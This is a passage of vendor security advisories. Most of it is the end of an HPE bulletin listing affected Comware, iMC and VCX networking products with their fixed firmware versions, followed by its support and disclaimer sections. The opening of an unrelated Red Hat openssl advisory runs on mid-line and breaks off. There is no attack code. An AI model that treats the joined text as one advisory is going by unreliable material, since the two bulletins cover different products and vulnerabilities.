Switch\n - JG225B HP 5800AF-48G Switch\n - JG242A HP 5800-48G-PoE+ TAA-compliant Switch with 2 Interface Slots\n - JG242B HP 5800-48G-PoE+ TAA-compliant Switch with 2 Interface\n - JG243A HP 5820-24XG-SFP+ TAA-compliant Switch\n - JG243B HP 5820-24XG-SFP+ TAA-compliant Switch\n - JG259A HP 5820X-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots\n\u0026 1 OAA Slot\n - JG259B HP 5820-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots\nand 1 OAA Slot\n - JC106A HP 5820-14XG-SFP+ Switch with 2 Slots\n - JC106B HP 5820-14XG-SFP+ Switch with 2 Interface Slots \u0026 1 OAA Slot\n - JG219A HP 5820AF-24XG Switch\n - JG219B HP 5820AF-24XG Switch\n - JC102A HP 5820-24XG-SFP+ Switch\n - JC102B HP 5820-24XG-SFP+ Switch\n + **5500 HI (Comware 5) - Version: R5501P21**\n * HP Network Products\n - JG311A HP 5500-24G-4SFP HI Switch with 2 Interface Slots\n - JG312A HP 5500-48G-4SFP HI Switch with 2 Interface Slots\n - JG541A HP 5500-24G-PoE+-4SFP HI Switch with 2 Interface Slots\n - JG542A HP 5500-48G-PoE+-4SFP HI Switch with 2 Interface Slots\n - JG543A HP 5500-24G-SFP HI Switch with 2 Interface Slots\n - JG679A HP 5500-24G-PoE+-4SFP HI TAA-compliant Switch with 2 Interface\nSlots\n - JG680A HP 5500-48G-PoE+-4SFP HI TAA-compliant Switch with 2 Interface\nSlots\n - JG681A HP 5500-24G-SFP HI TAA-compliant Switch with 2 Interface Slots\n + **5500 EI (Comware 5) - Version: R2221P22**\n * HP Network Products\n - JD373A HP 5500-24G DC EI Switch\n - JD374A HP 5500-24G-SFP EI Switch\n - JD375A HP 5500-48G EI Switch\n - JD376A HP 5500-48G-PoE EI Switch\n - JD377A HP 5500-24G EI Switch\n - JD378A HP 5500-24G-PoE EI Switch\n - JD379A HP 5500-24G-SFP DC EI Switch\n - JG240A HP 5500-48G-PoE+ EI Switch with 2 Interface Slots\n - JG241A HP 5500-24G-PoE+ EI Switch with 2 Interface Slots\n - JG249A HP 5500-24G-SFP EI TAA-compliant Switch with 2 Interface\n - JG250A HP 5500-24G EI TAA-compliant Switch with 2 Interface Slots\n - JG251A HP 5500-48G EI TAA-compliant Switch with 2 Interface Slots\n - JG252A HP 5500-24G-PoE+ EI TAA-compliant Switch with 2 Interface\nSlots\n - JG253A HP 5500-48G-PoE+ EI TAA-compliant Switch with 2 Interface\nSlots\n + **4800G (Comware 5) - Version: R2221P22**\n * HP Network Products\n - JD007A HP 4800-24G Switch\n - JD008A HP 4800-24G-PoE Switch\n - JD009A HP 4800-24G-SFP Switch\n - JD010A HP 4800-48G Switch\n - JD011A HP 4800-48G-PoE Switch\n + **5500SI (Comware 5) - Version: R2221P22**\n * HP Network Products\n - JD369A HP 5500-24G SI Switch\n - JD370A HP 5500-48G SI Switch\n - JD371A HP 5500-24G-PoE SI Switch\n - JD372A HP 5500-48G-PoE SI Switch\n - JG238A HP 5500-24G-PoE+ SI Switch with 2 Interface Slots\n - JG239A HP 5500-48G-PoE+ SI Switch with 2 Interface Slots\n + **4500G (Comware 5) - Version: R2221P22**\n * HP Network Products\n - JF428A HP 4510-48G Switch\n - JF847A HP 4510-24G Switch\n + **5120 EI (Comware 5) - Version: R2221P22**\n * HP Network Products\n - JE066A HP 5120-24G EI Switch\n - JE067A HP 5120-48G EI Switch\n - JE068A HP 5120-24G EI Switch with 2 Interface Slots\n - JE069A HP 5120-48G EI Switch with 2 Interface Slots\n - JE070A HP 5120-24G-PoE EI 2-slot Switch\n - JE071A HP 5120-48G-PoE EI 2-slot Switch\n - JG236A HP 5120-24G-PoE+ EI Switch with 2 Interface Slots\n - JG237A HP 5120-48G-PoE+ EI Switch with 2 Interface Slots\n - JG245A HP 5120-24G EI TAA-compliant Switch with 2 Interface Slots\n - JG246A HP 5120-48G EI TAA-compliant Switch with 2 Interface Slots\n - JG247A HP 5120-24G-PoE+ EI TAA-compliant Switch with 2 Slots\n - JG248A HP 5120-48G-PoE+ EI TAA-compliant Switch with 2 Slots\n + **4210G (Comware 5) - Version: R2221P22**\n * HP Network Products\n - JF844A HP 4210-24G Switch\n - JF845A HP 4210-48G Switch\n - JF846A HP 4210-24G-PoE Switch\n + **5120 SI (Comware 5) - Version: R1517**\n * HP Network Products\n - JE072A HP 5120-48G SI Switch\n - JE072B HPE 5120 48G SI Switch\n - JE073A HP 5120-16G SI Switch\n - JE073B HPE 5120 16G SI Switch\n - JE074A HP 5120-24G SI Switch\n - JE074B HPE 5120 24G SI Switch\n - JG091A HP 5120-24G-PoE+ (370W) SI Switch\n - JG091B HPE 5120 24G PoE+ (370W) SI Switch\n - JG092A HP 5120-24G-PoE+ (170W) SI Switch\n - JG309B HPE 5120 8G PoE+ (180W) SI Switch\n - JG310B HPE 5120 8G PoE+ (65W) SI Switch\n + **3610 (Comware 5) - Version: R5319P15**\n * HP Network Products\n - JD335A HP 3610-48 Switch\n - JD336A HP 3610-24-4G-SFP Switch\n - JD337A HP 3610-24-2G-2G-SFP Switch\n - JD338A HP 3610-24-SFP Switch\n + **3600V2 (Comware 5) - Version: R2111P01**\n * HP Network Products\n - JG299A HP 3600-24 v2 EI Switch\n - JG299B HP 3600-24 v2 EI Switch\n - JG300A HP 3600-48 v2 EI Switch\n - JG300B HP 3600-48 v2 EI Switch\n - JG301A HP 3600-24-PoE+ v2 EI Switch\n - JG301B HP 3600-24-PoE+ v2 EI Switch\n - JG301C HP 3600-24-PoE+ v2 EI Switch\n - JG302A HP 3600-48-PoE+ v2 EI Switch\n - JG302B HP 3600-48-PoE+ v2 EI Switch\n - JG302C HP 3600-48-PoE+ v2 EI Switch\n - JG303A HP 3600-24-SFP v2 EI Switch\n - JG303B HP 3600-24-SFP v2 EI Switch\n - JG304A HP 3600-24 v2 SI Switch\n - JG304B HP 3600-24 v2 SI Switch\n - JG305A HP 3600-48 v2 SI Switch\n - JG305B HP 3600-48 v2 SI Switch\n - JG306A HP 3600-24-PoE+ v2 SI Switch\n - JG306B HP 3600-24-PoE+ v2 SI Switch\n - JG306C HP 3600-24-PoE+ v2 SI Switch\n - JG307A HP 3600-48-PoE+ v2 SI Switch\n - JG307B HP 3600-48-PoE+ v2 SI Switch\n - JG307C HP 3600-48-PoE+ v2 SI Switch\n + **3100V2 (Comware 5) - Version: R5213P01**\n * HP Network Products\n - JD313B HPE 3100 24 PoE v2 EI Switch\n - JD318B HPE 3100 8 v2 EI Switch\n - JD319B HPE 3100 16 v2 EI Switch\n - JD320B HPE 3100 24 v2 EI Switch\n - JG221A HPE 3100 8 v2 SI Switch\n - JG222A HPE 3100 16 v2 SI Switch\n - JG223A HPE 3100 24 v2 SI Switch\n + **HP870 (Comware 5) - Version: R2607P51**\n * HP Network Products\n - JG723A HP 870 Unified Wired-WLAN Appliance\n - JG725A HP 870 Unified Wired-WLAN TAA-compliant Appliance\n + **HP850 (Comware 5) - Version: R2607P51**\n * HP Network Products\n - JG722A HP 850 Unified Wired-WLAN Appliance\n - JG724A HP 850 Unified Wired-WLAN TAA-compliant Appliance\n + **HP830 (Comware 5) - Version: R3507P51**\n * HP Network Products\n - JG640A HP 830 24-Port PoE+ Unified Wired-WLAN Switch\n - JG641A HP 830 8-port PoE+ Unified Wired-WLAN Switch\n - JG646A HP 830 24-Port PoE+ Unified Wired-WLAN TAA-compliant Switch\n - JG647A HP 830 8-Port PoE+ Unified Wired-WLAN TAA-compliant\n + **HP6000 (Comware 5) - Version: R2507P44**\n * HP Network Products\n - JG639A HP 10500/7500 20G Unified Wired-WLAN Module\n - JG645A HP 10500/7500 20G Unified Wired-WLAN TAA-compliant Module\n + **WX5004-EI (Comware 5) - Version: R2507P44**\n * HP Network Products\n - JD447B HP WX5002 Access Controller\n - JD448A HP WX5004 Access Controller\n - JD448B HP WX5004 Access Controller\n - JD469A HP WX5004 Access Controller\n + **SecBlade FW (Comware 5) - Version: R3181P07**\n * HP Network Products\n - JC635A HP 12500 VPN Firewall Module\n - JD245A HP 9500 VPN Firewall Module\n - JD249A HP 10500/7500 Advanced VPN Firewall Module\n - JD250A HP 6600 Firewall Processing Router Module\n - JD251A HP 8800 Firewall Processing Module\n - JD255A HP 5820 VPN Firewall Module\n + **F1000-E (Comware 5) - Version: TBD still fixing**\n * HP Network Products\n - JD272A HP F1000-E VPN Firewall Appliance\n + **F1000-A-EI (Comware 5) - Version: TBD still fixing**\n * HP Network Products\n - JG214A HP F1000-A-EI VPN Firewall Appliance\n + **F1000-S-EI (Comware 5) - Version: TBD still fixing**\n * HP Network Products\n - JG213A HP F1000-S-EI VPN Firewall Appliance\n + **F5000-A (Comware 5) - Version: F3210P26**\n * HP Network Products\n - JD259A HP A5000-A5 VPN Firewall Chassis\n - JG215A HP F5000 Firewall Main Processing Unit\n - JG216A HP F5000 Firewall Standalone Chassis\n + **U200S and CS (Comware 5) - Version: F5123P33**\n * HP Network Products\n - JD273A HP U200-S UTM Appliance\n + **U200A and M (Comware 5) - Version: F5123P33**\n * HP Network Products\n - JD275A HP U200-A UTM Appliance\n + **F5000-C/S (Comware 5) - Version: TBD still fixing**\n * HP Network Products\n - JG650A HP F5000-C VPN Firewall Appliance\n - JG370A HP F5000-S VPN Firewall Appliance\n + **SecBlade III (Comware 5) - Version: TBD still fixing**\n * HP Network Products\n - JG371A HP 12500 20Gbps VPN Firewall Module\n - JG372A HP 10500/11900/7500 20Gbps VPN Firewall Module\n + **6600 RSE RU (Comware 5 Low Encryption SW) - Version: R3303P28.RU**\n * HP Network Products\n - JC177A HP 6608 Router\n - JC177B HP 6608 Router Chassis\n - JC178A HP 6604 Router Chassis\n - JC178B HP 6604 Router Chassis\n - JC496A HP 6616 Router Chassis\n - JC566A HP 6600 RSE-X1 Router Main Processing Unit\n - JG780A HP 6600 RSE-X1 TAA-compliant Main Processing Unit\n + **6600 RPE RU (Comware 5 Low Encryption SW) - Version: R3303P28.RU**\n * HP Network Products\n - JC165A HP 6600 RPE-X1 Router Module\n - JC177A HP 6608 Router\n - JC177B HPE FlexNetwork 6608 Router Chassis\n - JC178A HPE FlexNetwork 6604 Router Chassis\n - JC178B HPE FlexNetwork 6604 Router Chassis\n - JC496A HPE FlexNetwork 6616 Router Chassis\n - JG781A HP 6600 RPE-X1 TAA-compliant Main Processing Unit\n + **6602 RU (Comware 5 Low Encryption SW) - Version: R3303P28.RU**\n * HP Network Products\n - JC176A HP 6602 Router Chassis\n + **HSR6602 RU (Comware 5 Low Encryption SW) - Version: R3303P28.RU**\n * HP Network Products\n - JC177A HP 6608 Router\n - JC177B HP 6608 Router Chassis\n - JC178A HP 6604 Router Chassis\n - JC178B HP 6604 Router Chassis\n - JC496A HP 6616 Router Chassis\n - JG353A HP HSR6602-G Router\n - JG354A HP HSR6602-XG Router\n - JG355A HP 6600 MCP-X1 Router Main Processing Unit\n - JG356A HP 6600 MCP-X2 Router Main Processing Unit\n - JG776A HP HSR6602-G TAA-compliant Router\n - JG777A HP HSR6602-XG TAA-compliant Router\n - JG778A HP 6600 MCP-X2 Router TAA-compliant Main Processing Unit\n + **HSR6800 RU (Comware 5 Low Encryption SW) - Version: R3303P28.RU**\n * HP Network Products\n - JG361A HP HSR6802 Router Chassis\n - JG361B HP HSR6802 Router Chassis\n - JG362A HP HSR6804 Router Chassis\n - JG362B HP HSR6804 Router Chassis\n - JG363A HP HSR6808 Router Chassis\n - JG363B HP HSR6808 Router Chassis\n - JG364A HP HSR6800 RSE-X2 Router Main Processing Unit\n - JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing Unit\n + **SMB1910 (Comware 5) - Version: R1113**\n * HP Network Products\n - JG540A HP 1910-48 Switch\n - JG539A HP 1910-24-PoE+ Switch\n - JG538A HP 1910-24 Switch\n - JG537A HP 1910-8 -PoE+ Switch\n - JG536A HP 1910-8 Switch\n + **SMB1920 (Comware 5) - Version: R1112**\n * HP Network Products\n - JG928A HP 1920-48G-PoE+ (370W) Switch\n - JG927A HP 1920-48G Switch\n - JG926A HP 1920-24G-PoE+ (370W) Switch\n - JG925A HP 1920-24G-PoE+ (180W) Switch\n - JG924A HP 1920-24G Switch\n - JG923A HP 1920-16G Switch\n - JG922A HP 1920-8G-PoE+ (180W) Switch\n - JG921A HP 1920-8G-PoE+ (65W) Switch\n - JG920A HP 1920-8G Switch\n + **V1910 (Comware 5) - Version: R1517P01**\n * HP Network Products\n - JE005A HP 1910-16G Switch\n - JE006A HP 1910-24G Switch\n - JE007A HP 1910-24G-PoE (365W) Switch\n - JE008A HP 1910-24G-PoE(170W) Switch\n - JE009A HP 1910-48G Switch\n - JG348A HP 1910-8G Switch\n - JG349A HP 1910-8G-PoE+ (65W) Switch\n - JG350A HP 1910-8G-PoE+ (180W) Switch\n + **SMB 1620 (Comware 5) - Version: R1110**\n * HP Network Products\n - JG914A HP 1620-48G Switch\n - JG913A HP 1620-24G Switch\n - JG912A HP 1620-8G Switch\n + **NJ5000 - Version: R1107**\n * HP Network Products\n - JH237A HPE FlexNetwork NJ5000 5G PoE+ Walljack\n\n\n**COMWARE 7 Products**\n\n + **12500 (Comware 7) - Version: R7377**\n * HP Network Products\n - JC072B HP 12500 Main Processing Unit\n - JC085A HP A12518 Switch Chassis\n - JC086A HP A12508 Switch Chassis\n - JC652A HP 12508 DC Switch Chassis\n - JC653A HP 12518 DC Switch Chassis\n - JC654A HP 12504 AC Switch Chassis\n - JC655A HP 12504 DC Switch Chassis\n - JF430A HP A12518 Switch Chassis\n - JF430B HP 12518 Switch Chassis\n - JF430C HP 12518 AC Switch Chassis\n - JF431A HP A12508 Switch Chassis\n - JF431B HP 12508 Switch Chassis\n - JF431C HP 12508 AC Switch Chassis\n - JG497A HP 12500 MPU w/Comware V7 OS\n - JG782A HP FF 12508E AC Switch Chassis\n - JG783A HP FF 12508E DC Switch Chassis\n - JG784A HP FF 12518E AC Switch Chassis\n - JG785A HP FF 12518E DC Switch Chassis\n - JG802A HP FF 12500E MPU\n + **10500 (Comware 7) - Version: R7180**\n * HP Network Products\n - JC611A HP 10508-V Switch Chassis\n - JC612A HP 10508 Switch Chassis\n - JC613A HP 10504 Switch Chassis\n - JC748A HP 10512 Switch Chassis\n - JG608A HP FlexFabric 11908-V Switch Chassis\n - JG609A HP FlexFabric 11900 Main Processing Unit\n - JG820A HP 10504 TAA Switch Chassis\n - JG821A HP 10508 TAA Switch Chassis\n - JG822A HP 10508-V TAA Switch Chassis\n - JG823A HP 10512 TAA Switch Chassis\n - JG496A HP 10500 Type A MPU w/Comware v7 OS\n - JH198A HP 10500 Type D Main Processing Unit with Comware v7 Operating\nSystem\n - JH206A HP 10500 Type D TAA-compliant with Comware v7 Operating System\nMain Processing Unit\n + **12900 (Comware 7) - Version: R1150**\n * HP Network Products\n - JG619A HP FlexFabric 12910 Switch AC Chassis\n - JG621A HP FlexFabric 12910 Main Processing Unit\n - JG632A HP FlexFabric 12916 Switch AC Chassis\n - JG634A HP FlexFabric 12916 Main Processing Unit\n - JH104A HP FlexFabric 12900E Main Processing Unit\n - JH114A HP FlexFabric 12910 TAA-compliant Main Processing Unit\n - JH263A HP FlexFabric 12904E Main Processing Unit\n - JH255A HP FlexFabric 12908E Switch Chassis\n - JH262A HP FlexFabric 12904E Switch Chassis\n - JH113A HP FlexFabric 12910 TAA-compliant Switch AC Chassis\n - JH103A HP FlexFabric 12916E Switch Chassis\n + **5900 (Comware 7) - Version: R2432P01**\n * HP Network Products\n - JC772A HP 5900AF-48XG-4QSFP+ Switch\n - JG296A HP 5920AF-24XG Switch\n - JG336A HP 5900AF-48XGT-4QSFP+ Switch\n - JG510A HP 5900AF-48G-4XG-2QSFP+ Switch\n - JG554A HP 5900AF-48XG-4QSFP+ TAA Switch\n - JG555A HP 5920AF-24XG TAA Switch\n - JG838A HP FF 5900CP-48XG-4QSFP+ Switch\n - JH036A HP FlexFabric 5900CP 48XG 4QSFP+ TAA-Compliant\n - JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant Switch\n - JH038A HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant\n + **MSR1000 (Comware 7) - Version: R0306P12**\n * HP Network Products\n - JG875A HP MSR1002-4 AC Router\n - JH060A HP MSR1003-8S AC Router\n + **MSR2000 (Comware 7) - Version: R0306P12**\n * HP Network Products\n - JG411A HP MSR2003 AC Router\n - JG734A HP MSR2004-24 AC Router\n - JG735A HP MSR2004-48 Router\n - JG866A HP MSR2003 TAA-compliant AC Router\n + **MSR3000 (Comware 7) - Version: R0306P12**\n * HP Network Products\n - JG404A HP MSR3064 Router\n - JG405A HP MSR3044 Router\n - JG406A HP MSR3024 AC Router\n - JG407A HP MSR3024 DC Router\n - JG408A HP MSR3024 PoE Router\n - JG409A HP MSR3012 AC Router\n - JG410A HP MSR3012 DC Router\n - JG861A HP MSR3024 TAA-compliant AC Router\n + **MSR4000 (Comware 7) - Version: R0306P12**\n * HP Network Products\n - JG402A HP MSR4080 Router Chassis\n - JG403A HP MSR4060 Router Chassis\n - JG412A HP MSR4000 MPU-100 Main Processing Unit\n - JG869A HP MSR4000 TAA-compliant MPU-100 Main Processing Unit\n + **VSR (Comware 7) - Version: E0322P01**\n * HP Network Products\n - JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation\nSoftware\n - JG811AAE HP VSR1001 Comware 7 Virtual Services Router\n - JG812AAE HP VSR1004 Comware 7 Virtual Services Router\n - JG813AAE HP VSR1008 Comware 7 Virtual Services Router\n + **7900 (Comware 7) - Version: R2150**\n * HP Network Products\n - JG682A HP FlexFabric 7904 Switch Chassis\n - JG841A HP FlexFabric 7910 Switch Chassis\n - JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit\n - JH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit\n - JH122A HP FlexFabric 7904 TAA-compliant Switch Chassis\n - JH123A HP FlexFabric 7910 TAA-compliant Switch Chassis\n - JH124A HP FlexFabric 7910 7.2Tbps TAA-compliant Fabric/Main\nProcessing Unit\n - JH125A HP FlexFabric 7910 2.4Tbps TAA-compliant Fabric/Main\nProcessing Unit\n + **5130 (Comware 7) - Version: R3113P02**\n * HP Network Products\n - JG932A HP 5130-24G-4SFP+ EI Switch\n - JG933A HP 5130-24G-SFP-4SFP+ EI Switch\n - JG934A HP 5130-48G-4SFP+ EI Switch\n - JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI Switch\n - JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch\n - JG938A HP 5130-24G-2SFP+-2XGT EI Switch\n - JG939A HP 5130-48G-2SFP+-2XGT EI Switch\n - JG940A HP 5130-24G-PoE+-2SFP+-2XGT (370W) EI Switch\n - JG941A HP 5130-48G-PoE+-2SFP+-2XGT (370W) EI Switch\n - JG975A HP 5130-24G-4SFP+ EI Brazil Switch\n - JG976A HP 5130-48G-4SFP+ EI Brazil Switch\n - JG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch\n - JG978A HP 5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch\n + **6125XLG - Version: R2432P01**\n * HP Network Products\n - 711307-B21 HP 6125XLG Blade Switch\n - 737230-B21 HP 6125XLG Blade Switch with TAA\n + **6127XLG - Version: R2432P01**\n * HP Network Products\n - 787635-B21 HP 6127XLG Blade Switch Opt Kit\n - 787635-B22 HP 6127XLG Blade Switch with TAA\n + **Moonshot - Version: R2432P01**\n * HP Network Products\n - 786617-B21 - HP Moonshot-45Gc Switch Module\n - 704654-B21 - HP Moonshot-45XGc Switch Module\n - 786619-B21 - HP Moonshot-180XGc Switch Module\n + **5700 (Comware 7) - Version: R2432P01**\n * HP Network Products\n - JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch\n - JG895A HP FlexFabric 5700-48G-4XG-2QSFP+ TAA-compliant Switch\n - JG896A HP FlexFabric 5700-40XG-2QSFP+ Switch\n - JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant Switch\n - JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch\n - JG899A HP FlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch\n + **5930 (Comware 7) - Version: R2432P01**\n * HP Network Products\n - JG726A HP FlexFabric 5930 32QSFP+ Switch\n - JG727A HP FlexFabric 5930 32QSFP+ TAA-compliant Switch\n - JH178A HP FlexFabric 5930 2QSFP+ 2-slot Switch\n - JH179A HP FlexFabric 5930 4-slot Switch\n - JH187A HP FlexFabric 5930 2QSFP+ 2-slot TAA-compliant Switch\n - JH188A HP FlexFabric 5930 4-slot TAA-compliant Switch\n + **HSR6600 (Comware 7) - Version: R7103P09**\n * HP Network Products\n - JG353A HP HSR6602-G Router\n - JG354A HP HSR6602-XG Router\n - JG776A HP HSR6602-G TAA-compliant Router\n - JG777A HP HSR6602-XG TAA-compliant Router\n + **HSR6800 (Comware 7) - Version: R7103P09**\n * HP Network Products\n - JG361A HP HSR6802 Router Chassis\n - JG361B HP HSR6802 Router Chassis\n - JG362A HP HSR6804 Router Chassis\n - JG362B HP HSR6804 Router Chassis\n - JG363A HP HSR6808 Router Chassis\n - JG363B HP HSR6808 Router Chassis\n - JG364A HP HSR6800 RSE-X2 Router Main Processing Unit\n - JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing\n - JH075A HP HSR6800 RSE-X3 Router Main Processing Unit\n + **1950 (Comware 7) - Version: R3113P02**\n * HP Network Products\n - JG960A HP 1950-24G-4XG Switch\n - JG961A HP 1950-48G-2SFP+-2XGT Switch\n - JG962A HP 1950-24G-2SFP+-2XGT-PoE+(370W) Switch\n - JG963A HP 1950-48G-2SFP+-2XGT-PoE+(370W) Switch\n + **7500 (Comware 7) - Version: R7180**\n * HP Network Products\n - JD238C HP 7510 Switch Chassis\n - JD239C HP 7506 Switch Chassis\n - JD240C HP 7503 Switch Chassis\n - JD242C HP 7502 Switch Chassis\n - JH207A HP 7500 1.2Tbps Fabric with 2-port 40GbE QSFP+ for IRF-Only\nMain Processing Unit\n - JH208A HP 7502 Main Processing Unit\n - JH209A HP 7500 2.4Tbps Fabric with 8-port 1/10GbE SFP+ and 2-port\n40GbE QSFP+ Main Processing Unit\n + **5510HI (Comware 7) - Version: R1120**\n * HP Network Products\n - JH145A HPE 5510 24G 4SFP+ HI 1-slot Switch\n - JH146A HPE 5510 48G 4SFP+ HI 1-slot Switch\n - JH147A HPE 5510 24G PoE+ 4SFP+ HI 1-slot Switch\n - JH148A HPE 5510 48G PoE+ 4SFP+ HI 1-slot Switch\n - JH149A HPE 5510 24G SFP 4SFP+ HI 1-slot Switch\n + **5130HI (Comware 7) - Version: R1120**\n * HP Network Products\n - JH323A HPE 5130 24G 4SFP+ 1-slot HI Switch\n - JH324A HPE 5130 48G 4SFP+ 1-slot HI Switch\n - JH325A HPE 5130 24G PoE+ 4SFP+ 1-slot HI Switch\n - JH326A HPE 5130 48G PoE+ 4SFP+ 1-slot HI Switch\n\n\n**iMC Products**\n\n + **IMC PLAT - Version: 7.2 E0403P04**\n * HP Network Products\n - JD125A HP IMC Std S/W Platform w/100-node\n - JD126A HP IMC Ent S/W Platform w/100-node\n - JD808A HP IMC Ent Platform w/100-node License\n - JD814A HP A-IMC Enterprise Edition Software DVD Media\n - JD815A HP IMC Std Platform w/100-node License\n - JD816A HP A-IMC Standard Edition Software DVD Media\n - JF288AAE HP Network Director to Intelligent Management Center\nUpgrade E-LTU\n - JF289AAE HP Enterprise Management System to Intelligent Management\nCenter Upgrade E-LTU\n - JF377A HP IMC Std S/W Platform w/100-node Lic\n - JF377AAE HP IMC Std S/W Pltfrm w/100-node E-LTU\n - JF378A HP IMC Ent S/W Platform w/200-node Lic\n - JF378AAE HP IMC Ent S/W Pltfrm w/200-node E-LTU\n - JG546AAE HP IMC Basic SW Platform w/50-node E-LTU\n - JG548AAE HP PCM+ to IMC Bsc Upgr w/50-node E-LTU\n - JG549AAE HP PCM+ to IMC Std Upgr w/200-node E-LTU\n - JG747AAE HP IMC Std SW Plat w/ 50 Nodes E-LTU\n - JG748AAE HP IMC Ent SW Plat w/ 50 Nodes E-LTU\n - JG768AAE HP PCM+ to IMC Std Upg w/ 200-node E-LTU\n + **IMC iNode - Version: 7.2 E0407**\n * HP Network Products\n - JD144A HP A-IMC User Access Management Software Module with 200-user\nLicense\n - JD147A HP IMC Endpoint Admission Defense Software Module with\n200-user License\n - JD435A HP A-IMC Endpoint Admission Defense Client Software\n - JF388A HP IMC User Authentication Management Software Module with\n200-user License\n - JF388AAE HP IMC User Authentication Management Software Module with\n200-user E-LTU\n - JF391A HP IMC Endpoint Admission Defense Software Module with\n200-user License\n - JF391AAE HP IMC Endpoint Admission Defense Software Module with\n200-user E-LTU\n - JG752AAE HP IMC User Access Manager Software Module with 50-user\nE-LTU\n - JG754AAE) HP IMC Endpoint Admission Defense Software Module with\n50-user E-LTU\n + **iMC UAM_TAM - Version: 7.1 E0406**\n * HP Network Products\n - JF388A HP IMC UAM S/W MODULE W/200-USER LICENSE\n - JF388AAE HP IMC UAM S/W MODULE W/200-USER E-LTU\n - JG752AAE HP IMC UAM SW MOD W/ 50-USER E-LTU\n - JG483A HP IMC TAM S/W MODULE W/100-NODE LIC\n - JG483AAE HP IMC TAM S/W MODULE W/100-NODE E-LTU\n - JG764AAE HP IMC TAM SW MOD W/ 50-NODE E-LTU\n + **IMC WSM - Version: 7.2 E0502P04**\n * HP Network Products\n - JD456A HP IMC WSM Software Module with 50-Access Point License\n - JF414A HP IMC Wireless Service Manager Software Module with 50-Access\nPoint License\n - JF414AAE HP IMC Wireless Service Manager Software Module with\n50-Access Point E-LTU\n - JG551AAE HP PCM+ Mobility Manager to IMC Wireless Service Manager\nModule Upgrade with 250 Access Point E-LTU\n - JG758AAE HP IMC WSM/RTLS w/ 50-node E-LTU\n - JG769AAE HP PCM Mobility Manager to IMC Wireless Service Manager Upg\nwith 250-node E-LTU\n\n**VCX Products**\n\n + **VCX - Version: 9.8.19**\n * HP Network Products\n - J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr\n - J9668A HP VCX IPC V7005 Pltfrm w/ DL120 G6 Srvr\n - JC517A HP VCX V7205 Platform w/DL 360 G6 Server\n - JE355A HP VCX V6000 Branch Platform 9.0\n - JC516A HP VCX V7005 Platform w/DL 120 G6 Server\n - JC518A HP VCX Connect 200 Primry 120 G6 Server\n - J9669A HP VCX IPC V7310 Pltfrm w/ DL360 G7 Srvr\n - JE341A HP VCX Connect 100 Secondary\n - JE252A HP VCX Connect Primary MIM Module\n - JE253A HP VCX Connect Secondary MIM Module\n - JE254A HP VCX Branch MIM Module\n - JE355A HP VCX V6000 Branch Platform 9.0\n - JD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod\n - JD023A HP MSR30-40 Router with VCX MIM Module\n - JD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM\n - JD025A HP MSR30-16 RTR w/VCX + 4FXO/2FXS Mod\n - JD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS Mod\n - JD027A HP MSR30-16 RTR w/VCX + 8BRI/4FXS Mod\n - JD029A HP MSR30-16 RTR w/VCX + E1/4BRI/4FXS\n - JE340A HP VCX Connect 100 Pri Server 9.0\n - JE342A HP VCX Connect 100 Sec Server 9.0\n\n**Note:** Please contact HPE Technical Support if any assistance is needed\nacquiring the software updates. \n\nHISTORY\nVersion:1 (rev.1) - 21 February 2017 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HPE Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hpe.com. \n\nReport: To report a potential security vulnerability for any HPE supported\nproduct:\n Web form: https://www.hpe.com/info/report-security-vulnerability\n Email: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin\nalerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial\nerrors or omissions contained herein. The information provided is provided\n\"as is\" without warranty of any kind. To the extent permitted by law, neither\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. Hewlett\nPackard Enterprise and the names of Hewlett Packard Enterprise products\nreferenced herein are trademarks of Hewlett Packard Enterprise in the United\nStates and other countries. Other product and company names mentioned herein\nmay be trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: openssl security update\nAdvisory ID: RHSA-2015:2617-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2015-2617.html\nIssue date: 2015-12-14\nCVE Names: CVE-2015-3194 CVE-2015-3195 CVE-2015-3196 \n=====================================================================\n\n1. Summary:\n\nUpdated openssl packages that fix three security issues are now available\nfor Red Hat Enterprise Linux 6 and 7. \n\nRed Hat Product Security has rated this update as having Moderate 